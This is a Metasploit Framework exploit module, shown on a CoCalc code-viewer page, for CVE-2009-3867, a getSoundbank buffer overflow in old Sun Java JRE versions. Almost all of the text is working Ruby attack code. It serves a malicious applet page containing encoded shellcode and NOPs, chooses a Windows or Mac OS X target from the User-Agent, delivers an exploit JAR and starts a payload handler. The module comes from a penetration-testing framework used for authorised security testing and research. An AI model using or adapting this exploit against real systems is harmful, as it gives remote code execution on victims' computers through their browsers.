CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/browser/java_getsoundbank_bof.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78#9# This module acts as an HTTP server10#11include Msf::Exploit::Remote::HttpServer::HTML1213def initialize(info = {})14super(update_info(info,15'Name' => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',16'Description' => %q{17This module exploits a flaw in the getSoundbank function in the Sun JVM.1819The payload is serialized and passed to the applet via PARAM tags. It must be20a native payload.2122The effected Java versions are JDK and JRE 6 Update 16 and earlier,23JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and24earlier, and SDK and JRE 1.3.1_26 and earlier.2526NOTE: Although all of the above versions are reportedly vulnerable, only271.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.28},29'License' => MSF_LICENSE,30'Author' =>31[32'kf', # Original PoC/exploit33'jduck' # metasploit version34],35'References' =>36[37[ 'CVE', '2009-3867' ],38[ 'OSVDB', '59711' ],39[ 'BID', '36881' ],40[ 'ZDI', '09-076' ]41],42'Payload' =>43{44'Space' => 1024,45'BadChars' => '',46'DisableNops' => true,47},48'Platform' => %w{ win osx },49'Targets' =>50[51=begin5253No automatic targetting for now ...5455[ 'J2SE 1.6_16 Automatic',56{57'Platform' => %w{ linux osx win },58'Arch' => [ARCH_X86, ARCH_PPC]59}60],61=end62[ 'J2SE 1.6_16 on Windows x86',63{64'Platform' => 'win',65'Arch' => ARCH_X8666}67],68[ 'J2SE 1.6_16 on Mac OS X PPC',69{70'Platform' => 'osx',71'Arch' => ARCH_PPC,72}73],74[ 'J2SE 1.6_16 on Mac OS X x86',75{76'Platform' => 'osx',77'Arch' => ARCH_X86,78}79],80],81'DefaultTarget' => 0,82'DisclosureDate' => '2009-11-04'83))84end858687def exploit88# load the static jar89path = File.join(Msf::Config.data_directory, "exploits", "CVE-2009-3867.jar")90fd = File.open(path, "rb")91@jar_data = fd.read(fd.stat.size)92fd.close9394super95end969798def on_request_uri(cli, req)99100# Create a cached mapping between IP and detected target101@targetcache ||= {}102@targetcache[cli.peerhost] ||= {}103@targetcache[cli.peerhost][:update] = Time.now.to_i104105if (target.name =~ /Automatic/)106case req.headers['User-Agent']107when /Windows/i108print_status("Choosing a Windows target")109@targetcache[cli.peerhost][:target] = self.targets[1]110when /PPC Mac OS X/i111print_status("Choosing a Mac OS X PPC target")112@targetcache[cli.peerhost][:target] = self.targets[2]113when /Intel Mac OS X/i114print_status("Choosing a Mac OS X x86 target")115@targetcache[cli.peerhost][:target] = self.targets[3]116else117print_status("Unknown target for: #{req.headers['User-Agent']}")118end119end120121# Clean the cache122rmq = []123@targetcache.each_key do |addr|124if (Time.now.to_i > @targetcache[addr][:update]+60)125rmq.push addr126end127end128129rmq.each {|addr| @targetcache.delete(addr) }130131132# Request processing133if (not req.uri.match(/\.jar$/i))134135# Redirect to the base directory so the applet code loads...136if (not req.uri.match(/\/$/))137print_status("Sending redirect so path ends with / ...")138send_redirect(cli, get_resource() + '/', '')139return140end141142# Display the applet loading HTML143print_status("Sending HTML")144send_response_html(cli, generate_html(payload.encoded),145{146'Content-Type' => 'text/html',147'Pragma' => 'no-cache'148})149return150end151152# Send the actual applet over153print_status("Sending applet")154send_response(cli, generate_applet(cli, req),155{156'Content-Type' => 'application/octet-stream',157'Pragma' => 'no-cache'158})159160# Handle the payload161handler(cli)162end163164165def generate_html(pl)166167html = <<-EOF168<html>169<head>170<!-- <meta http-equiv=refresh content=10 /> -->171</head>172<body>173<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>174<param name='sc' value='SCODE' />175<param name='np' value='NOPS' />176</applet>177</body>178</html>179EOF180181# finalize the html182jar_name = rand_text_alphanumeric(32) + '.jar'183html.gsub!(/JARNAME/, jar_name)184185# add payload186debug_payload = false187pload = ""188pload << "\xcc" if debug_payload189pload << pl190if ((pload.length % 4) > 0)191pload << rand_text((4 - (pload.length % 4)))192end193if debug_payload194print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))195end196html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))197198# add nops199nops = "\x90\x90\x90\x90"200html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))201#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))202203return html204205end206207208def generate_applet(cli, req)209210this_target = nil211if (target.name =~ /Automatic/)212if (@targetcache[cli.peerhost][:target])213this_target = @targetcache[cli.peerhost][:target]214else215return ''216end217else218this_target = target219end220221return @jar_data222end223end224225226